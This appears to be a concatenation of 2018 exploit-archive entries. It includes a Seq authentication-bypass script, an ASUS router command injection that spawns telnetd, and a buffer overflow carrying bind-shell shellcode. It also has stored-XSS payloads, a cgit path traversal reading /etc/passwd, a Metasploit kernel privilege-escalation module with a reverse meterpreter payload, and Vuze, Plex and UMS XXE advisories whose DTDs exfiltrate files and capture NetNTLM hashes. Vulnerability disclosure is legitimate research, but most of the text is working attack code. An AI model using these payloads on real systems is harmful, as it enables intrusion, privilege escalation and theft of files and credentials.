1. Create a test file 'C:\Users\Public\pwned.txt' on the Windows hosts where UMS is installed. Please 1 line of text with no whitespaces inside, like this:
```
secretstuff!
```
2. Execute the evil-ssdp tool as follows from a Linux host on the same network:
```
essdp.py eth0 -t xxe-exfil # instructs tool to use the 'xxe-exfil' template for zero-day hunting
```
3. Back on the Windows host, simply restart UMS. evil-ssdp will display messages like the following
```
[XML REQUEST] Host: 10.0.200.10, User-Agent: UMS/7.1.0 Windows10/10.0 UPnP/1.0 Cling/2.0
GET /ssdp/device-desc.xml
[XXE VULN!!!!] Host: 10.0.200.10, User-Agent: Java/1.8.0_171
GET /ssdp/data.dtd
[EXFILTRATION] Host: 10.0.200.10, User-Agent: Java/1.8.0_171
GET /?exfiltrated=secretstuff!
```
# Exploit Title: AgataSoft Auto PingMaster 1.5 - 'Host name' Denial of Service (PoC)
# Discovery by: Luis Martinez
# Discovery Date: 2018-08-02
# Vendor Homepage: http://agatasoft.com/
# Software Link : http://agatasoft.com/Ping_Master.exe
# Tested Version: 1.5
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es
# Steps to Produce the Crash:
# 1.- Run python code : python AgataSoft_Auto_PingMaster_1.5.py
# 2.- Open AgataSoft_Auto_PingMaster_1.5.txt and copy content to clipboard
# 3.- Open Ping_Master.exe
# 4.- Trace Route
# 5.- Paste ClipBoard on "Host name:"
# 6.- Get IP from host name
# 7.- Crashed
#!/usr/bin/env python
buffer = "\x41" * 742
f = open ("AgataSoft_Auto_PingMaster_1.5.txt", "w")
f.write(buffer)
f.close()
# Exploit Title: Seq 4.2.476 - Authentication Bypass
# Date: 2018-08-02
# Exploit Author: Daniel Chactoura
# Vendor Homepage: https://getseq.net/
# Software Link: https://getseq.net/Download/All
# Version: <= 4.2.476
# CVE : CVE-2018-8096
# Post Reference: https://medium.com/stolabs/bypass-admin-authentication-on-seq-17f0f9e02732
# coding=utf-8
#!/bin/python
import sys
import requests
def verifyArgs(args):
if len(args) < 2:
print('[!] Usage: '+str(args[0])+' https://target')
exit(0)
elif 'http' not in str(args[1]):
print('''[!] Missing "https://" !''')
exit(0)
else:
return(1)
def verifyVersion(url):
vulnVersions = ['4.2.476','4.2.470','4.1.17','4.1.16',
'4.1.14','4.0.60','4.0.58','3.4.20',
'3.4.18','3.4.17','3.3.23','3.3.22',
'3.3.21','3.3.20','3.2.16','3.1.17',
'3.1.16','3.0.30','2.4.2','2.3.4',
'2.3.3','2.2.8','2.1.22','2.1.21',
'2.0.19','1.6.13','1.6.12','1.6.11',
'1.6.10','1.6.9','1.6.8','1.6.7',
'1.6.6','1.6.5','1.6.4','1.5.19',
'1.5.18','1.5.17','1.5.16','1.4.12',
'1.4.11','1.4.10','1.4.9','1.4.8',
'1.4.7','1.4.6','1.3.11','1.3.10',
'1.3.9','1.3.8']
u = str(url)
verifV = requests.get(u+'/api/')
verifVJSON = verifV.json()
ver = str(verifVJSON['Version'])[:-2]
if ver in vulnVersions:
print("[+] Seq's version is potentially vulnerable!")
return(1)
else:
print("[!] Seq's version is probably not vulnerable!")
return(0)
def bypassAuth(url):
u = str(url)
payload = "{'Name':'isauthenticationenabled','Value':false,'Id':'setting-isauthenticationenabled','Links':{'Self':'api/settings/setting-isauthenticationenabled','Group':'api/settings/resources'}}"
h = {'User-Agent':'Mozilla/5.0 (X11; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0', 'Referer':u}
verifM = requests.put(u+'/api/settings/setting-isauthenticationenabled', data=payload, headers=h)
verifMCode = str(verifM.status_code)
if verifMCode == '200':
print("[:)] YES! Success! Now, access the url and have fun!")
else:
print("[:(] DAMN! This is not your lucky day...")
def main():
try:
if verifyArgs(sys.argv):
if verifyVersion(sys.argv[1]):
bypassAuth(sys.argv[1])
else:
c = input('[?] Do you want to try it anyway? (y/n): ').lower()
if c == 'y':
pass
elif c == 'n':
exit(0)
else:
print('[!] Invalid choice!')
exit(0)
except KeyboardInterrupt:
exit(0)
if __name__ == '__main__':
main()
# Exploit Title: ASUS DSL-N12E_C1 1.1.2.3_345 - Remote Command Execution
# Date: 2018-08-02
# Exploit Author: Fakhri Zulkifli (@d0lph1n98)
# Vendor Homepage: https://www.asus.com/
# Software Link: https://www.asus.com/Networking/DSLN12E_C1/HelpDesk_BIOS/
# Version: 1.1.2.3_345
# Tested on: 1.1.2.3_345
GET /Main_Analysis_Content.asp?current_page=Main_Analysis_Content.asp&next_page=Main_Analysis_Content.asp&next_host=www.target.com&group_id=&modified=0&action_mode=+Refresh+&action_script=&action_wait=&first_time=&applyFlag=1&preferred_lang=EN&firmver=1.1.2.3_345-g987b580&cmdMethod=ping&destIP=%60utelnetd+-p+1337%60&pingCNT=5 HTTP/1.1
Host: www.target.com
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://www.target.com/Main_Analysis_Content.asp
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
# To connect
1. telnet www.target.com 1337
###########################################################################################
# Exploit Title: Socumsoft Wedding Slideshow Studio 1.36
# Date: 02.08.2018
# Exploit Author: Achilles
# Vendor Homepage: http://www.socusoft.com
# Vulnerable Software: http://www.socusoft.com/down/wedding-slideshow-studio.exe
# Tested on OS: Windows 7 64-bit DE
# Steps to reproduce: Copy the contents of the file (Evil.txt)
# and paste in the License Name field click Register and BOOM
###########################################################################################
#!/usr/bin/env python
file = open("Evil.txt","wb")
junk = "\x41" * 512
nseh = "\x90\x90\xeb\x06" #jmp short 6
seh = "\x91\x54\x01\x10" #pop pop retn DVDPhotoData.dll
nops = "\x90" * 20
buf = ""
buf += "\xda\xd5\xb8\x9b\x69\x4d\xa1\xd9\x74\x24\xf4\x5a\x33" #Bind shellcode port 4444
buf += "\xc9\xb1\x60\x83\xc2\x04\x31\x42\x15\x03\x42\x15\x79"
buf += "\x9c\xf2\x9b\x0c\xb0\x35\x05\x03\x97\x32\x91\x2f\x75"
buf += "\x92\x10\x7e\xdf\xd5\xdf\x95\x63\xd0\x24\x96\x1e\xca"
buf += "\xc6\x57\x4b\xd9\xe7\x3c\xe4\x1c\xa0\xd9\x7e\x72\xe4"
buf += "\x38\x26\xd1\x92\x88\x79\x63\x55\xe3\x94\xfe\x9a\xac"
buf += "\xb5\xde\xe4\x35\xbc\xd0\x9f\xe6\x92\x63\x51\x5a\xaf"
buf += "\xad\x1b\xb0\xf9\x6e\x46\xac\x68\xa9\x48\xce\xb8\xe1"
buf += "\xd2\xf5\x1a\x7d\x84\xde\xb9\x55\xa0\xe8\xe3\xd8\xb2"
buf += "\x31\xfb\x1a\x0b\xea\xed\xf4\x8f\xdd\xf5\x55\xbf\x1a"
buf += "\xa5\xe8\xd8\xfa\xde\x45\x11\x7c\x4d\xea\x87\x0f\x9f"
buf += "\xe5\xdf\x90\x18\x7e\x52\x1b\xd7\x24\x22\xab\x1b\xda"
buf += "\x31\xa2\x75\x8f\xa3\x13\x99\x20\x5e\x07\x57\x68\x3e"
buf += "\x10\xc7\xc2\xb0\x2b\xa0\x13\xd6\x6a\x3e\xc3\x1e\x99"
buf += "\x4f\xf0\xce\x63\x50\xe3\x90\x80\x3e\x0e\x9c\x39\x7e"
buf += "\x48\xe6\xf0\xe7\x3b\xd3\x7d\xe3\xa3\x62\x41\xee\x19"
buf += "\xd0\xa8\xc9\xdb\x02\x93\x0f\x34\xb0\xad\x81\x08\x57"
buf += "\xce\xb8\x38\xfe\x13\xc9\xe7\x40\xc2\x17\xa6\x3a\x4c"
buf += "\x06\x31\xfc\x3f\x8f\xcb\x85\x84\x74\x98\x9c\x63\xe5"
buf += "\x46\x2f\xfc\x15\x3b\x5c\x37\xd3\x36\xfc\x39\x3c\x86"
buf += "\x29\x32\xbb\xb3\x04\x13\x6a\xd1\xa7\x55\xac\x8e\xa8"
buf += "\x05\xaf\xc3\xae\x9d\xc6\x5f\xa8\x9d\x8e\x4a\x25\x3a"
buf += "\x35\xa3\xd7\x4c\xaa\xb1\x87\xca\x54\x6d\xdc\xb2\xf3"
buf += "\x3a\xaa\x29\xea\x44\x01\x4e\xb0\x08\x9a\xd0\xb5\x69"
buf += "\x42\xe5\xb4\x5f\x59\xff\xb4\x90\xe2\x97\x66\x09\x89"
buf += "\x87\x8e\xff\xa8\x21\x68\x3f\x01\xe9\xb3\x27\x63\xd2"
buf += "\x93\x2f\x4d\x9c\x28\x21\xd4\x9d\xad\x8f\x24\x19\xc9"
buf += "\x98\xbc\x24\x0b\x47\x84\x9c\x57\xd2\x20\x79\x71\x67"
buf += "\xe0\xd1\xcd\x40\x51\x7d\xe2\x39\xa9\xd2\x92\x4c\x24"
buf += "\x59\x7b\xfd\x89\x6e\xea\xec\xc8\xac\x54\x8a\x26\x60"
buf += "\x81\x38\x06\x32\xab\x56\x1c\xe7\xd0\x78\xe5\xa2\x75"
buf += "\xc8\x28\x1b\xd5\x3f\x51"
exploit = junk + nseh + seh + nops + buf
file.write(exploit)
file.close()
*******************************************************************************************
# Exploit Title: PHP Template Store Script- 3.0.6 - Stored XSS via Addres ,Bank Name,and A/c Holder Name
# Date: 02.08.2018
# Site Titel : Exclusive Scripts
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: http://www.exclusivescript.com/
# Category: Web Application
# Version: 3.0.6
# Exploit Author: Sarafraz Khan
# Contact: https://www.facebook.com/sarfraj.khan.79
# Web: https://goglequeens.com
# Tested on: Windows 10 -Firefox
# CVE-2018-14869
*****************************************************************************************
Proof of Concept:-
--------------------------
1. Go to the site ( http://www.server.com/ ) .
2- Click on => Login => Register => and then fill the Form and click on Register Now
3-Goto your mail and Verify it.
4-Now come back to site and Sign in using your Verified mail and Password.
5-Goto Setting => Personal information and paste these code in
Address line 1 => "><img src=x onerror=prompt(/SARAFRAZ/)>
Address Line 2 => "><img src=x onerror=prompt(/KHAN/)>
Bank name => "><img src=x onerror=prompt(/KING/)>
A/C Holder name => "><img src=x onerror=prompt(/GOOGLEQUEENS/)>
and then click on Update Profile.
6-Now You will having popup of /SARAFRAZ/ , /KHAN/ , / KING/ and /GOOGLEQUEENS/ in you account..
***************************************************************************************
There is a directory traversal vulnerability in cgit_clone_objects(), reachable when the configuration flag enable-http-clone is set to 1 (default):
void cgit_clone_objects(void)
{
if (!ctx.qry.path) {
cgit_print_error_page(400, "Bad request", "Bad request");
return;
}
if (!strcmp(ctx.qry.path, "info/packs")) {
print_pack_info();
return;
}
send_file(git_path("objects/%s", ctx.qry.path));
}
send_file() is a function that simply sends the data stored at the given filesystem path out over the network.
git_path() partially rewrites the provided path and e.g. prepends the base path of the repository, but it does not sanitize the provided path to prevent directory traversal.
ctx.qry.path can come from querystring_cb(), which takes unescaped data from the querystring. To trigger this case:
$ curl http://127.0.0.1/cgit/cgit.cgi/git/objects/?path=../../../../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = GoodRanking
include Msf::Post::File
include Msf::Post::Linux::Priv
include Msf::Post::Linux::System
include Msf::Post::Linux::Kernel
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Linux Kernel UDP Fragmentation Offset (UFO) Privilege Escalation',
'Description' => %q{
This module attempts to gain root privileges on Linux systems by abusing
UDP Fragmentation Offload (UFO).
This exploit targets only systems using Ubuntu (Trusty / Xenial) kernels
4.4.0-21 <= 4.4.0-89 and 4.8.0-34 <= 4.8.0-58, including Linux distros
based on Ubuntu, such as Linux Mint.
The target system must have unprivileged user namespaces enabled
and SMAP disabled.
Bypasses for SMEP and KASLR are included. Failed exploitation
may crash the kernel.
This module has been tested successfully on various Ubuntu and Linux
Mint systems, including:
Ubuntu 14.04.5 4.4.0-31-generic x64 Desktop;
Ubuntu 16.04 4.8.0-53-generic;
Linux Mint 17.3 4.4.0-89-generic;
Linux Mint 18 4.8.0-58-generic
},
'License' => MSF_LICENSE,
'Author' =>
[
'Andrey Konovalov', # Discovery and C exploit
'h00die', # Metasploit module
'Brendan Coles' # Metasploit module
],
'DisclosureDate' => 'Aug 10 2017',
'Platform' => [ 'linux' ],
'Arch' => [ ARCH_X64 ],
'SessionTypes' => [ 'shell', 'meterpreter' ],
'Targets' => [[ 'Auto', {} ]],
'Privileged' => true,
'References' =>
[
[ 'CVE', '2017-1000112' ],
[ 'EDB', '43418' ],
[ 'BID', '100262' ],
[ 'URL', 'http://seclists.org/oss-sec/2017/q3/277' ],
[ 'URL', 'https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-1000112/poc.c' ],
[ 'URL', 'https://git.kernel.org/pub/scm/linux/kernel/git/davem/net.git/commit/?id=85f1bd9a7b5a79d5baa8bf44af19658f7bf77bfa' ],
[ 'URL', 'https://people.canonical.com/~ubuntu-security/cve/CVE-2017-1000112' ],
[ 'URL', 'https://securingtomorrow.mcafee.com/mcafee-labs/linux-kernel-vulnerability-can-lead-to-privilege-escalation-analyzing-cve-2017-1000112/' ],
[ 'URL', 'https://ricklarabee.blogspot.com/2017/12/adapting-poc-for-cve-2017-1000112-to.html' ],
[ 'URL', 'https://github.com/bcoles/kernel-exploits/commits/cve-2017-1000112' ]
],
'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' },
'DefaultTarget' => 0))
register_options [
OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w[Auto True False] ]),
OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
]
end
def base_dir
datastore['WritableDir'].to_s
end
def upload(path, data)
print_status "Writing '#{path}' (#{data.size} bytes) ..."
rm_f path
write_file path, data
end
def upload_and_chmodx(path, data)
upload path, data
cmd_exec "chmod +x '#{path}'"
end
def upload_and_compile(path, data)
upload "#{path}.c", data
gcc_cmd = "gcc -o #{path} #{path}.c"
if session.type.eql? 'shell'
gcc_cmd = "PATH=$PATH:/usr/bin/ #{gcc_cmd}"
end
output = cmd_exec gcc_cmd
rm_f "#{path}.c"
unless output.blank?
print_error output
fail_with Failure::Unknown, "#{path}.c failed to compile"
end
cmd_exec "chmod +x #{path}"
end
def exploit_data(file)
path = ::File.join Msf::Config.data_directory, 'exploits', 'cve-2017-1000112', file
fd = ::File.open path, 'rb'
data = fd.read fd.stat.size
fd.close
data
end
def live_compile?
return false unless datastore['COMPILE'].eql?('Auto') || datastore['COMPILE'].eql?('True')
if has_gcc?
vprint_good 'gcc is installed'
return true
end
unless datastore['COMPILE'].eql? 'Auto'
fail_with Failure::BadConfig, 'gcc is not installed. Compiling will fail.'
end
end
def check
version = kernel_release
unless version =~ /^4\.4\.0-(21|22|24|28|31|34|36|38|42|45|47|51|53|57|59|62|63|64|66|67|70|71|72|75|78|79|81|83|87|89|81|89)-generic/ ||
version =~ /^4\.8\.0-(34|36|39|41|45|46|49|51|52|53|54|56|58)-generic/
vprint_error "Linux kernel version #{version} is not vulnerable"
return CheckCode::Safe
end
vprint_good "Linux kernel version #{version} is vulnerable"
vprint_status 'Checking if SMAP is enabled ...'
if smap_enabled?
vprint_error 'SMAP is enabled'
return CheckCode::Safe
end
vprint_good 'SMAP is not enabled'
arch = kernel_hardware
unless arch.include? 'x86_64'
vprint_error "System architecture #{arch} is not supported"
return CheckCode::Safe
end
vprint_good "System architecture #{arch} is supported"
unless userns_enabled?
vprint_error 'Unprivileged user namespaces are not permitted'
return CheckCode::Safe
end
vprint_good 'Unprivileged user namespaces are permitted'
CheckCode::Appears
end
def exploit
unless check == CheckCode::Appears
fail_with Failure::NotVulnerable, 'Target not vulnerable! punt!'
end
if is_root?
fail_with Failure::BadConfig, 'Session already has root privileges'
end
unless cmd_exec("test -w '#{base_dir}' && echo true").include? 'true'
fail_with Failure::BadConfig, "#{base_dir} is not writable"
end
# Upload exploit executable
executable_name = ".#{rand_text_alphanumeric rand(5..10)}"
executable_path = "#{base_dir}/#{executable_name}"
if live_compile?
vprint_status 'Live compiling exploit on system...'
upload_and_compile executable_path, exploit_data('exploit.c')
else
vprint_status 'Dropping pre-compiled exploit on system...'
upload_and_chmodx executable_path, exploit_data('exploit.out')
end
# Upload payload executable
payload_path = "#{base_dir}/.#{rand_text_alphanumeric rand(5..10)}"
upload_and_chmodx payload_path, generate_payload_exe
# Launch exploit
print_status 'Launching exploit ...'
output = cmd_exec "echo '#{payload_path} & exit' | #{executable_path}"
output.each_line { |line| vprint_status line.chomp }
print_status "Cleaning up #{payload_path} and #{executable_path} ..."
rm_f executable_path
rm_f payload_path
end
end
Issue: Out-of-Band XXE in Vuze Bittorrent Client's SSDP Processing
Reserved CVE: CVE-2018-13417
# Vulnerability Overview
The XML parsing engine for Vuze Bittorrent Client's SSDP/UPNP functionality is vulnerable to an XML External Entity Processing (XXE) attack. Unauthenticated attackers on the same LAN can use this vulnerability to:
- Access arbitrary files from the filesystem with the same permission as the user account running Vuze.
- Initiate SMB connections to capture NetNTLM challenge/response and crack to clear-text password.
- Initiate SMB connections to relay NetNTLM challenge/response and achieve Remote Command Execution in Windows domains.
Exploitation can be demonstrated using evil-ssdp (https://gitlab.com/initstring/evil-ssdp).
# Discovered By
Chris Moberly @ The Missing Link Security
# Vendor Status
Multiple attempts to contact Vuze team resulted in no replies.
# Vulnerability Details
Attack type: Remote, unauthenticated
Impact: Information disclosure up to code execution
Affected component: Vuze Bittorrent Client's SSDP discovery / XML parsing
Operating Systems affected: Verified Windows 10 (likely all versions)
Vuze version affected: Tested on 5.7.6.0 (current as of July 2018). Older versions likely also vulnerable.
Attack vector: XXE
# Technical Overview
Vuze, like many other media servers, will attempt to discover other devices on a local network. The discovery process is handled by Simple Service Discovery Protocol (SSDP), which sends a UDP multicast out to 239.255.255.250 on port 1900. This is the first step in finding and adding Universal Plug and Play (UPNP) devices.
We can reply to that UDP multicast directly on the same port that the request initiated from, informing this client that we have a shared device. When we do this, we provide the location of an XML file containing more information about our device. This is called a Device Descriptor.
Vuze will automatically access the Device Descriptor over HTTP, parsing the XML content. This is expected behaviour for SSDP/UPNP.
By hosting a specially crafted XML file at that location, we can force Vuze to do several things. The POC used to prove this vulnerability (POC 1 below) contained the following XML content:
```
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file://///$smbServer/smb/hash.jpg" >
<!ENTITY xxe-url SYSTEM "http://$localIp:$localPort/ssdp/xxe.html" >
]>
<hello>&xxe;&xxe-url;</hello>
<root>
<specVersion>
<major>1</major>
<minor>0</minor>
</specVersion>
<device>
```
When Vuze parses this, it does two things:
1. Accesses the SMB share running at the $smbServer variable. This allows us to collect or relay the NetNTLM challenge/response.
2. Accesses an HTTP server at the $localIp variable. This is used for verification purposes while testing the vulnerability.
The unexpected behaviour here is the ability to provide the `ENTITY` tags, forcing Vuze to automatically access file paths and HTTP URLs.
# POC 1: Capcturing NetNTLM Challenge/Response
This is a common attack method inside a Windows domain, where compromising an account can assist with moving laterally through the network.
This vulnerability can be easily validated using the [evil-ssdp tool found here](https://gitlab.com/initstring/evil-ssdp).
The process is:
1. Execute the evil-ssdp tool as follows from a Linux host:
```
essdp.py eth0 -t xxe-smb # instructs tool to use the 'xxe' template for zero-day hunting
```
2. From the same Linux host, either launch a simple netcat listener like this:
```
sudo nc -nlvp 445
```
or use Impacket to listen and extract the NetNTLM challenge/response as follows:
```
sudo python examples/smbserver.py smb /tmp/smb/
```
3. From a Windows host on the same network, simply restart Vuze. evil-ssdp will display messages like the following:
```
[M-SEARCH] New Host 192.168.1.100, Service Type: urn:schemas-upnp-org:device:InternetGatewayDevice:1
[XML REQUEST] Host: 192.168.1.100, User-Agent: Azureus 5.7.6.0;Windows 10;Java 1.8.0_121
GET /ssdp/device-desc.xml
[XXE VULN!!!!] Host: 192.168.1.100, User-Agent: Java/1.8.0_121
GET /ssdp/xxe.html
[XXE VULN!!!!] Host: 192.168.1.100, User-Agent: Java/1.8.0_121
GET /ssdp/xxe.html
```
When that happens, either the netcat listener or the Impacket SMB server will receive the connection. If using Impacket, you will now have the NetNTLM challenge/response of the user running Vuze. This can be cracked to clear-text using tools like Hashcat. Alternatively, you can use Impacket to relay that hash to another machine on the network, achieving remote code execution.
# POC 2: Accessing Arbitrary Files
If an attacker knows specifically what files they are looking for, this same vulnerability can be used to extract that information. Essentially, an XML entity will be defined as a variable, storing the output of a file on the machine where Vuze is installed. Then, an HTTP request will be sent to the attacker's machine that includes that variable. The attacker will be able to see this file in their HTTP server logs.
We need two files hosted on the attacking server to do this. The initial Device Descriptor sent is:
```
<!DOCTYPE data[
<!ENTITY % file SYSTEM "file:///C:/users/public/pwned.txt">
<!ENTITY % dtd SYSTEM "http://$localIp:$localPort/ssdp/data.dtd">
%dtd;
]>
<data>&send;</data>
```
Which triggers another connection request to the following data.dtd file:
```
<!ENTITY % all "<!ENTITY send SYSTEM 'http://$localIp:$localPort/?exfiltrated=%file;'>">
%all;
```
We can also verify this using the evil-ssdp tool, using the 'xxe-exfil' template. For this POC, only extraction of 1-line files was found to be possible.
To reproduce:
1. Create a test file 'C:\Users\Public\pwned.txt' on the Windows hosts where Vuze is installed. Please 1 line of text with no whitespaces inside, like this:
```
secretstuff!
```
2. Execute the evil-ssdp tool as follows from a Linux host on the same network:
```
essdp.py eth0 -t xxe-exfil # instructs tool to use the 'xxe-exfil' template for zero-day hunting
```
3. Back on the Windows host, simply restart Vuze. evil-ssdp will display messages like the following
```
[M-SEARCH] New Host 10.0.200.10, Service Type: urn:schemas-upnp-org:device:InternetGatewayDevice:1
[XML REQUEST] Host: 192.168.1.100, User-Agent: Azureus 5.7.6.0;Windows 10;Java 1.8.0_121
GET /ssdp/device-desc.xml
[XXE VULN!!!!] Host: 192.168.1.100, User-Agent: Java/1.8.0_121
GET /ssdp/data.dtd
[XXE VULN!!!!] Host: 192.168.1.100, User-Agent: Java/1.8.0_121
GET /ssdp/data.dtd
[EXFILTRATION] Host: 192.168.1.100, User-Agent: Java/1.8.0_121
GET /?exfiltrated=secretstuff!
[EXFILTRATION] Host: 192.168.1.100, User-Agent: Java/1.8.0_121
GET /?exfiltrated=secretstuff!
```
Issue: Out-of-Band XXE in Plex Media Server's SSDP Processing
Reserved CVE: CVE-2018-13415
# Vulnerability Overview
The XML parsing engine for Plex Media Server's SSDP/UPNP functionality is vulnerable to an XML External Entity Processing (XXE) attack. Unauthenticated attackers on the same LAN can use this vulnerability to:
- Access arbitrary files from the filesystem with the same permission as the user account running Plex.
- Initiate SMB connections to capture NetNTLM challenge/response and crack to clear-text password.
- Initiate SMB connections to relay NetNTLM challenge/response and achieve Remote Command Execution in Windows domains.
Exploitation can be demonstrated using evil-ssdp (https://gitlab.com/initstring/evil-ssdp).
# Discovered By
Chris Moberly @ The Missing Link Security
# Vendor Status
Disclosed to Plex security team, pending resolution.
# Vulnerability Details
Attack type: Remote, unauthenticated
Impact: Information disclosure up to code execution
Affected component: Plex Media Server's SSDP discovery / parsing with libxml2
Operating Systems affected: Verified Windows 10 and Ubuntu Linux 18.10 (likely all versions)
Plex version affected: Tested on 1.13.2.5154 (current as of July 2018). Older versions likely also vulnerable.
Attack vector: XXE
# Technical Overview
Plex, like many other media servers, will attempt to discover other devices on a local network. The discovery process is handled by Simple Service Discovery Protocol (SSDP), which sends a UDP multicast out to 239.255.255.250 on port 1900. This is the first step in finding and adding Universal Plug and Play (UPNP) devices.
We can reply to that UDP multicast directly on the same port that the request initiated from, informing this client that we have a shared device. When we do this, we provide the location of an XML file containing more information about our device. This is called a Device Descriptor.
Plex will automatically access the Device Descriptor over HTTP, parsing the XML content. This is expected behaviour for SSDP/UPNP.
By hosting a specially crafted XML file at that location, we can force Plex Media Server to do several things. The POC used to prove this vulnerability (POC 1 below) contained the following XML content:
```
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file://///$smbServer/smb/hash.jpg" >
<!ENTITY xxe-url SYSTEM "http://$localIp:$localPort/ssdp/xxe.html" >
]>
<hello>&xxe;&xxe-url;</hello>
<root>
<specVersion>
<major>1</major>
<minor>0</minor>
</specVersion>
<device>
```
When Plex parses this, it does two things:
1. Accesses the SMB share running at the $smbServer variable. This allows us to collect or relay the NetNTLM challenge/response.
2. Accesses an HTTP server at the $localIp variable. This is used for verification purposes while testing the vulnerability.
The unexpected behaviour here is the ability to provide the `ENTITY` tags, forcing Plex to automatically access file paths and HTTP URLs. While our POC above uses an SMB share for attacking Windows clients, this could be modified to read local files into a variable and then pass that variable via HTTP to an attacker-controlled server. This type of attack could be used to read the contents of local files (like /etc/passwd in the Linux world).
# POC 1: Capcturing NetNTLM Challenge/Response
This is a common attack method inside a Windows domain, where compromising an account can assist with moving laterally through the network.
This vulnerability can be easily validated using the [evil-ssdp tool found here](https://gitlab.com/initstring/evil-ssdp).
The process is:
1. Execute the evil-ssdp tool as follows from a Linux host:
```
essdp.py eth0 -t xxe-smb # instructs tool to use the 'xxe' template for zero-day hunting
```
2. From the same Linux host, either launch a simple netcat listener like this:
```
sudo nc -nlvp 445
```
or use Impacket to listen and extract the NetNTLM challenge/response as follows:
```
sudo python examples/smbserver.py smb /tmp/smb/
```
3. From a Windows host on the same network, simply restart Plex. evil-ssdp will display messages like the following:
```
[M-SEARCH] New Host 192.168.1.100, Service Type: ssdp:all
[XML REQUEST] Host: 192.168.1.100, User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36
GET /ssdp/device-desc.xml
[XML REQUEST] Host: 192.168.1.100, User-Agent: DVBLink
GET /ssdp/device-desc.xml
[XXE VULN!!!!] Host: 192.168.1.100, User-Agent: None
```
When that happens, either the netcat listener or the Impacket SMB server will receive the connection. If using Impacket, you will now have the NetNTLM challenge/response of the user running Plex. This can be cracked to clear-text using tools like Hashcat. Alternatively, you can use Impacket to relay that hash to another machine on the network, achieving remote code execution.
# POC 2: Accessing Arbitrary Files
If an attacker knows specifically what files they are looking for, this same vulnerability can be used to extract that information. Essentially, an XML entity will be defined as a variable, storing the output of a file on the machine where Plex is installed. Then, an HTTP request will be sent to the attacker's machine that includes that variable. The attacker will be able to see this file in their HTTP server logs.
We need two files hosted on the attacking server to do this. The initial Device Descriptor sent is:
```
<!DOCTYPE data[
<!ENTITY % file SYSTEM "file:///C:/users/public/pwned.txt">
<!ENTITY % dtd SYSTEM "http://$localIp:$localPort/ssdp/data.dtd">
%dtd;
]>
<data>&send;</data>
```
Which triggers another connection request to the following data.dtd file:
```
<!ENTITY % all "<!ENTITY send SYSTEM 'http://$localIp:$localPort/?exfiltrated=%file;'>">
%all;
```
We can also verify this using the evil-ssdp tool, using the 'xxe-exfil' template. For this POC, only extraction of 1-line files was found to be possible.
To reproduce:
1. Create a test file 'C:\Users\Public\pwned.txt' on the Windows hosts where Plex is installed. Please 1 line of text with no whitespaces inside, like this:
```
secretstuff!
```
2. Execute the evil-ssdp tool as follows from a Linux host on the same network:
```
essdp.py eth0 -t xxe-exfil # instructs tool to use the 'xxe-exfil' template for zero-day hunting
```
3. Back on the Windows host, simply restart Plex. evil-ssdp will display messages like the following
```
[XML REQUEST] Host: 192.168.1.100, User-Agent: DVBLink
GET /ssdp/device-desc.xml
[XXE VULN!!!!] Host: 192.168.1.100, User-Agent: None
GET /ssdp/data.dtd
[EXFILTRATION] Host: 192.168.1.100, User-Agent: None
GET /?exfiltrated=secretstuff!
```